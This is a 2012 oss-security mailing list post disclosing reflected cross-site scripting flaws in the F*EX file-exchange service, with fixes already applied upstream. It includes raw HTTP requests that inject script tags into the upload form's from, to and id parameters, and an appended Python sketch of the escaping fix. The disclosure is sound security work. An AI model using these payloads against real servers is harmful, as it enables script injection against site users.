Date: Mon, 20 Feb 2012 12:14:23 +0100
From: muuratsalo experimental hack lab <muuratsalo@...il.com>
To: oss-security@...ts.openwall.com
Cc: Ulli Horlacher <framstag@....uni-stuttgart.de>
Subject: Vulnerabilities in Debian F*EX <= 20100208 and F*EX 20111129-2.

Dear Sir/Madam,
I am Nicola Fioravanti aka muuratsalo | muuratsalo experimental hack lab.
I am writing you because I have discovered some vulnerabilities in
Debian F*EX <= 20100208 (stable) and F*EX 20111129-2. (testing and
unstable)
I have already contacted the Author who confirmed the vulnerabilities
and applied the suggested fixes.
A major update of F*EX has been released on the 15th of February
2012. The Debian Maintainer of the package is working on it.
Together with the Author we decided not to release any public advisory
before the release of the new Debian package.

I would be grateful if you could assign CVE ids to the discovered issues.

You will find the two advisories as an attachment.

Best regards,
/NF

------------------------------------------------------------------------
F*EX <= 20100208 Cross Site Scripting Vulnerabilities
------------------------------------------------------------------------


title.............: F*EX <= 20100208 Cross Site Scripting Vulnerabilities
author............: muuratsalo 
contact...........: muuratsalo[at]gmail[dot]com
download..........: http://fex.rus.uni-stuttgart.de/fex.html
tested on.........: Debian 6.0.4 (squeeze) - package fex_20100208+debian1-1+squeeze1_all.deb


========================================================================

muuratsalo | muuratsalo experimental hack lab is a proud member of the Revshell.com community

========================================================================

[0x01] Software overview

F*EX (Frams's Fast File EXchange) is a service (GPL software) that can be
used to allow users anywhere on the Internet to exchange files of ANY size
quickly and conveniently. The sender uploads the file to the F*EX-server
and the recipient automatically gets a notification e-mail with a
download-URL. The sender must be a registered user, in contrast to the
recipient.

========================================================================

[0x02] Vulnerabilities overview

F*EX <= 20100208 suffers from multiple Cross Site Scripting attacks (Reflected) in the WWW upload form.

========================================================================

[0x03] Disclosure timeline

[2012-02-01] - Multiple vulnerabilities discovered and reported to the author of the software.
[2012-02-02] - The author confirmed the vulnerabilities and applied the suggested fixes.
[2012-02-03] - Further analysis requested.
[2012-02-13] - Very minor security hints applied.
[2012-02-15] - F*EX major update - 20120215
[2012-02-XX] - Public disclosure

========================================================================

[0x04] Vulnerabilities

------------------------------------------------------------------------
------------------------------------------------------------------------

*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [from parameter] ***

POST /fup HTTP/1.1
Host: 192.168.1.3:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://192.168.1.3:8888/fup
Content-Type: multipart/form-data; boundary=--------1922591683
Content-Length: 233

----------1922591683
Content-Disposition: form-data; name="id"


----------1922591683
Content-Disposition: form-data; name="to"


----------1922591683
Content-Disposition: form-data; name="from"

38c66<script>alert(1)</script>b08f61c45c6
----------1922591683--

------------------------------------------------------------------------
------------------------------------------------------------------------

*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [to parameter] ***

POST /fup HTTP/1.1
Host: 192.168.1.3:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://192.168.1.3:8888/fup
Content-Type: multipart/form-data; boundary=--------1922591683
Content-Length: 233

----------1922591683
Content-Disposition: form-data; name="id"


----------1922591683
Content-Disposition: form-data; name="to"

38c66<script>alert(1)</script>b08f61c45c6

----------1922591683
Content-Disposition: form-data; name="from"

----------1922591683--

------------------------------------------------------------------------
------------------------------------------------------------------------

*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [id parameter] ***

GET /fup?id=38c66"><script>alert(1)</script>b08f61c45c6&to=%0d&from=%0d HTTP/1.1

------------------------------------------------------------------------
------------------------------------------------------------------------




------------------------------------------------------------------------
F*EX 20111129-2 Cross Site Scripting Vulnerability
------------------------------------------------------------------------


title.............: F*EX 20111129-2 Cross Site Scripting Vulnerabilities
author............: muuratsalo 
contact...........: muuratsalo[at]gmail[dot]com
download..........: http://fex.rus.uni-stuttgart.de/fex.html
tested on.........: Debian wheezy - package fex_20111129-2_all.deb


========================================================================

muuratsalo | muuratsalo experimental hack lab is a proud member of the Revshell.com community

========================================================================

[0x01] Software overview

F*EX (Frams's Fast File EXchange) is a service (GPL software) that can be
used to allow users anywhere on the Internet to exchange files of ANY size
quickly and conveniently. The sender uploads the file to the F*EX-server
and the recipient automatically gets a notification e-mail with a
download-URL. The sender must be a registered user, in contrast to the
recipient.

========================================================================

[0x02] Vulnerabilities overview

F*EX 20111129-2 suffers from a Cross Site Scripting attack (Reflected) in the WWW upload form.

========================================================================

[0x03] Disclosure timeline

[2012-02-01] - Multiple vulnerabilities discovered and reported to the author of the software.
[2012-02-02] - The author confirmed the vulnerabilities and applied the suggested fixes.
[2012-02-03] - Further analysis requested.
[2012-02-13] - Very minor security hints applied.
[2012-02-15] - F*EX major update - 20120215
[2012-02-XX] - Public disclosure

========================================================================

[0x04] Vulnerability

------------------------------------------------------------------------
------------------------------------------------------------------------

*** Cross Site Scripting (Reflected) -- http://localhost:8888/fup [id parameter] ***

GET /fup?id=38c66"><script>alert(1)</script>b08f61c45c6&to=%0d&from=%0d HTTP/1.1

------------------------------------------------------------------------
------------------------------------------------------------------------
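
Added example, not part of the original advisory and not F*EX code: a Python sketch of the output encoding that closes this class of reflection for the from, to and id values, with a regression check that uses the probe strings quoted above. The form markup and the function names are assumptions made for illustration.

```python
import html

# Hypothetical stand-in for the /fup upload form; the markup is assumed,
# not taken from F*EX.
FORM = (
    '<form action="/fup" method="post" enctype="multipart/form-data">\n'
    '<input type="text" name="from" value="{frm}">\n'
    '<input type="text" name="to" value="{to}">\n'
    '<input type="password" name="id" value="{id}">\n'
    '</form>\n'
    '<p>Sender: {frm}</p>\n'
)

def render_unsafe(frm, to, id_):
    """The 'before' behaviour: request values are copied into the page as-is."""
    return FORM.format(frm=frm, to=to, id=id_)

def render_escaped(frm, to, id_):
    """Encode &, <, >, " and ' so values stay data in both element and
    double-quoted attribute context."""
    enc = lambda v: html.escape(v, quote=True)
    return FORM.format(frm=enc(frm), to=enc(to), id=enc(id_))

def reflected_raw(page, value):
    """Regression check: True if a value containing markup characters
    appears in the response unencoded."""
    return any(c in value for c in '<>"\'') and value in page

# Probe strings quoted in the advisory above.
PROBE_ELEMENT = '38c66<script>alert(1)</script>b08f61c45c6'
PROBE_ATTRIBUTE = '38c66"><script>alert(1)</script>b08f61c45c6'

if __name__ == "__main__":
    for render in (render_unsafe, render_escaped):
        page = render(PROBE_ELEMENT, PROBE_ELEMENT, PROBE_ATTRIBUTE)
        print(render.__name__, "reflects raw input:",
              reflected_raw(page, PROBE_ATTRIBUTE))
```

The same check can be run against a patched server's real responses to confirm that none of the three parameters comes back unencoded.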

